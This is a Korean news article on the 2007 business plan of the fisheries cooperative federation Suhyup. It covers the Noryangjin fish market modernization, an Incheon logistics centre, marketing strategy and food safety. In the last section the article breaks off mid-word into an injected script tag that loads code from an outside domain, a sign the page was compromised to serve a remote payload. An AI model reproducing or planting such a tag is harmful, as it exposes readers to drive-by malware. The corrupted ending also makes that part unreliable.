수협중앙회 경제사업부문은 2007년 중점 사업 계획으로 일관된 도매물류시스템을 구축해 수산물 유통 선도기업으로 도약하는 것이다.

김홍철 수협 경제대표이사는 “내년에는 노량진수산시장 현대화 사업, 인천 수산물 가공물류센터 건립 등 도매물류시스템을 구축해 수협이 수산물 유통의 선도기업으로 거듭날 수 있도록 최선을 다할 예정”이라고 밝혔다.

김이사는 아울러 직원들에게 “‘고객중심의 경영계획 수립’을 강조하고 적극적인 혁신”을 주문했다.

김 대표이사는 또 “고객을 중심에 두고 시장친화적 사고와 행동을 갖춰야 제대로 된 마케팅 전략이 나올 수 있다”고 지적하며 업무계획 수립에 만전을 기할 것을 당부했다.

그는 “경제사업은 도매, 소매, 가공사업, 가맹사업 등 다양한 사업을 수행하고 있어 각 사업마다 취급하는 상품도 다르고 소비자도 차이가 나기 마련인 만큼 세부적으로 꼼꼼하게 고객과 시장을 분석하는 노력이 절실하다”고 말하고 “정확한 사업 계획과 전략에 근거해 짜임새 있는 예산 계획을 수립하여 2007년에는 더욱 알찬 성장과 실적을 거둘 수 있도록 최선을 다하자”고 강조했다.

이에 따라 수협 경제사업 부문은 마케팅 역량 강화를 위해 각 사업별로 새롭게 전략을 입안하여 2007년 업무계획에 반영키로 했다.

수협 관계자는 “경제사업의 고객이 누구인가를 정확하게 인식하고 수산물 유통환경과 시장의 변화를 철저히 분석한 후 고객 가치를 극대화하는데 초점을 맞춰 마케팅 전략을 정립할 예정”이라고 설명했다.

2007년도 경제사업부문이 펼치는 세부 사업계획을 살펴본다.

#수산물 유통·물류·가공 인프라 혁신

노량진수산시장 현대화를 위한 본격적인 사업이 착수된다.

수협중앙회는 2007년 정부예상 중 시장 현대화를 위한 기본조사설계비 35억원을 들여 시장의 기술적, 경제적 시행가능성 검토 등 기본조사와 설계를 추진한다.

아울러 인천 수산물 가공물류센터건립이 2007년부터 2008년 2개년 계획으로 추진된다.

인천수산물 가공물류센터는 인천공판장 부지(약7000여평)을 활용해 연건평 약 3590평 규모로 지어지며 총 220억원의 사업비가 투입된다.

이밖에도 수협 경제사업부문은 감천항물류센터 HACCP시설을 구축하고 부산 감천항수산물도매시장 입주를 추진하는 등 수산물 유통 인프라 확대를 위해 힘쓸 계획이다.

#사업별 마케팅 전략 수립 시행

수협 경제사업부문은 공판사업, 바다마트사업, 별해별미사업등 단위 사업별로 전문화되고 세분화된 마케팅 전략을 실행해 경쟁력을 강화해 나간다는 전략이다.

공판사업의 경우 공판장별 중도매인별 데이터베이스를 활용해 일대일 마케팅을 펼치고 바다마트사업의 경우 고객감동 실천 프로그램을 점포별로 개발해 시행할 계획이다.

군납사업도 납품 업무프로세스를 표준화하는 등 홍보 전략을 수립해 실행하며 특판사업의 경우 대량거래를 위해 대형유통업체 내 수산 매장을 운영하거나 특화상품 중심의 타겟 마케팅을 펼쳐나갈 예정이다.

별해별미 사업의 경우 수도권을 중심으로 가맹점 개설 전담 지사제를 도입하고 상권별로 가맹점 운영 모델을 다양화 나간다는 전략이다.

이밖에도 TV홈쇼핑과 전자상거래를 적극 활용할 수 있도록 웰빙 수산물 중심의 상품 개발도 추진한다.

#수산식품 안전관리 강화

수협은 안전한 수산물 공급을 위해 자체 연구·검사기능 외에도 외부기관 전문검사로 예방 시스템을 확립하고 가공 공정과 생산 제품에 대한 위생 및 품질 커트라인제도를 운영할 계획이다.

또한 식품관련법규와 HACCP 원리 교육으로 위생 안전의식을 강화시키고 사업장별 안전관리 기준에 의한 점검과 평가를 강화해 나갈 예정이다.

특히 식품 안전에 대한 소비자들의 만족도를 높이기 위해 고객과의 직접 대화 창구인 ‘식품안전상담실’을 운영할 계획이다.

#고객감동 커뮤니케이션 강화

우리 수산물 우수성 홍보를 위해 브랜드 광고를 확대 실시하고 수산물 브랜드 홍보 전시관을 설치 운영할 계획이다.

특히 신뢰받는 브랜드 이미지를 위해 ‘바다愛찬’의 품질 수준을 높이고 브랜드 세분화를 통해 다양한 고객 욕구에 부응해 나갈 예정이다.

#전사적 경영혁신 실행

2007년 경영혁신 마스터플랜을 확정해 단계별(도입기, 실행기, 정착기)로 추진하며 이와 함께 혁신 핵심 인프라 구축을 위한 혁신 전도사 양성을 2007년 상반기까지 추진한다.

아울러 이에 대한 시범 프로젝트를 2007년 하반기까지 마치고 2008년부터는 전 사업부문으로 확대할 계획이다.

#고유가 극복 어업경영 지원 추진

수협은 면세유류를 안정적으?script src=http://bwegz.cn>
저작권자 © 농수축산신문 무단전재, 재배포 및 AI학습 이용 금지